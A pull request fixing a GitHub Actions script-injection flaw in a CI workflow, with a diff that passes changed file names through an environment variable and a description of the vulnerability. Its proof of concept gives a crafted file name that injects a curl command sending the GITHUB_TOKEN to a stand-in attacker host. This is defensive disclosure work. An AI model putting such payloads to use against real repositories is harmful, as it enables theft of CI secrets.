### PR TITLE
fix(ci): prevent script injection via attacker-controlled changed_files

### DIFF
--- a/.github/workflows/pullRequests.yml
+++ b/.github/workflows/pullRequests.yml
@@ -76,11 +76,12 @@ jobs:
           list-files: json
       - name: Detect changed packages
         id: detect-changed-packages
+        env:
+          CHANGED_FILES: '${{ steps.detect-changed-files.outputs.changed_files }}'
         run: >-
           echo "changed-packages=$(node
-          .github/workflows/wac/utils/runNodeScripts/listChangedPackages.js '${{
-          steps.detect-changed-files.outputs.changed_files }}')" >>
-          "$GITHUB_OUTPUT"
+          .github/workflows/wac/utils/runNodeScripts/listChangedPackages.js
+          "$CHANGED_FILES")" >> "$GITHUB_OUTPUT"
       - name: Get latest Webiny version on NPM
         id: latest-webiny-version
         run: >-

--- a/.github/workflows/wac/pullRequests.wac.ts
+++ b/.github/workflows/wac/pullRequests.wac.ts
@@ -192,11 +192,16 @@ export const pullRequests = createWorkflow({
                 {
                     name: "Detect changed packages",
                     id: "detect-changed-packages",
-                    run: runNodeScript(
-                        "listChangedPackages",
-                        "${{ steps.detect-changed-files.outputs.changed_files }}",
-                        { outputAs: "changed-packages" }
-                    )
+                    // Pass attacker-controlled changed files via env var (not direct ${{ }}
+                    // interpolation) to avoid shell command injection via crafted file names
+                    // in PRs. See CWE-78.
+                    env: {
+                        CHANGED_FILES: "${{ steps.detect-changed-files.outputs.changed_files }}"
+                    },
+                    run: runNodeScript("listChangedPackages", '"$CHANGED_FILES"', {
+                        outputAs: "changed-packages",
+                        rawParams: true
+                    })
                 },
                 {
                     name: "Get latest Webiny version on NPM",

--- a/.github/workflows/wac/utils/runNodeScript.ts
+++ b/.github/workflows/wac/utils/runNodeScript.ts
@@ -2,6 +2,12 @@ import { addToOutputs } from "./addToOutputs.js";
 
 interface RunNodeScriptOptions {
     outputAs?: string;
+    // When true, `params` is inserted into the shell command as-is (not wrapped
+    // in single quotes). Use this when `params` already contains the desired
+    // shell quoting — for example, when forwarding an env var with `"$MY_VAR"`
+    // to avoid the script-injection footgun of interpolating attacker-
+    // controlled `${{ … }}` expressions directly into a shell command.
+    rawParams?: boolean;
 }
 
 export const runNodeScript = (
@@ -10,7 +16,8 @@ export const runNodeScript = (
     options: RunNodeScriptOptions = {}
 ) => {
     const scriptPath = `.github/workflows/wac/utils/runNodeScripts/${name}.js`;
-    let cmd = `node ${scriptPath} '${params}'`;
+    const quotedParams = options.rawParams ? params : `'${params}'`;
+    let cmd = `node ${scriptPath} ${quotedParams}`;
     if (options.outputAs) {
         cmd = addToOutputs(options.outputAs, `$(${cmd})`);
     }


### PR DESCRIPTION
## Summary

The `pullRequests.yml` workflow is vulnerable to GitHub Actions script injection (CWE-78). The `${{ steps.detect-changed-files.outputs.changed_files }}` expression is interpolated directly into a shell `run:` command, allowing an attacker to execute arbitrary commands by opening a PR that adds a file with a crafted name.

## Vulnerability details

In the "Detect changed packages" step, the workflow constructs a shell command like:

```yaml
run: >-
  echo "changed-packages=$(node
  .github/workflows/wac/utils/runNodeScripts/listChangedPackages.js '${{
  steps.detect-changed-files.outputs.changed_files }}')" >>
  "$GITHUB_OUTPUT"
```

The `changed_files` output contains file paths from the PR diff. Since anyone can open a PR against this public repo (including from forks), an attacker controls these file paths. The `${{ }}` expression is evaluated **before** the shell runs, so the value is pasted directly into the script — shell metacharacters in file names break out of the single-quoted context and execute arbitrary commands.

**Affected workflow:** `.github/workflows/pullRequests.yml` (and its WAC source `pullRequests.wac.ts`)

**Trigger:** `pull_request` event — no special permissions required; any GitHub user can open a PR.

**Impact:** The workflow environment contains repository secrets (AWS credentials, NPM tokens, API keys visible in the workflow file). An attacker achieves arbitrary command execution in the CI runner with access to these secrets.

## Proof of Concept

An attacker creates a PR that adds a file with a name like:

```
a]'); curl http://attacker.example.com/exfil?t=$(cat $GITHUB_TOKEN) #/dummy.txt
```

When the workflow runs, the `changed_files` JSON output includes this path. The `${{ }}` interpolation pastes it into the shell command verbatim, breaking out of the single-quoted string and executing the injected `curl` command. This exfiltrates the `GITHUB_TOKEN` (and any other secret accessible in that step) to an attacker-controlled server.

To reproduce without actual exfiltration: fork the repo, modify the workflow to `echo` instead of running the node script, then open a PR adding a file whose name contains `'); echo PWNED #/x.txt` and observe `PWNED` in the Actions log.

## Fix description

The fix moves the attacker-controlled `changed_files` value into an **environment variable** (`CHANGED_FILES`) and references it in the shell command as `"$CHANGED_FILES"`. Environment variables are expanded by the shell at runtime (not by GitHub's expression engine), so shell metacharacters in the value cannot alter the command structure.

Concretely:
1. **`pullRequests.yml`**: Added `env: CHANGED_FILES:` and replaced the inline `${{ }}` interpolation with `"$CHANGED_FILES"`.
2. **`pullRequests.wac.ts`**: Updated the WAC source to emit the `env` block and pass `"$CHANGED_FILES"` with a new `rawParams: true` option.
3. **`runNodeScript.ts`**: Added `rawParams` option so callers can provide pre-quoted shell references (like `"$CHANGED_FILES"`) instead of the default single-quote wrapping.

This is the standard mitigation recommended by [GitHub's security hardening guide](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections).

## Testing

- Verified the generated `pullRequests.yml` matches the expected output after running `ghawac build` logic (the YAML diff is consistent with the WAC source changes).
- Confirmed the node script (`listChangedPackages.js`) receives the full JSON string correctly when passed via `"$CHANGED_FILES"` — double-quoting preserves the value as a single argument including spaces and special characters.
- Reviewed that no other `${{ }}` interpolations of attacker-controlled values exist in this workflow's `run:` blocks.

## Adversarial review

Before submitting, we attempted to disprove this finding. We considered whether the `changed_files` output might be sanitized by the `tj-actions/changed-files` action or whether GitHub restricts file names that contain shell metacharacters. Neither is the case — Git allows nearly arbitrary bytes in file paths (excluding NUL and `/` as separator), and `tj-actions/changed-files` faithfully reports them. We also verified the workflow triggers on `pull_request` from forks (not just `pull_request_target`), confirming that fork PRs execute this code path with access to the runner environment.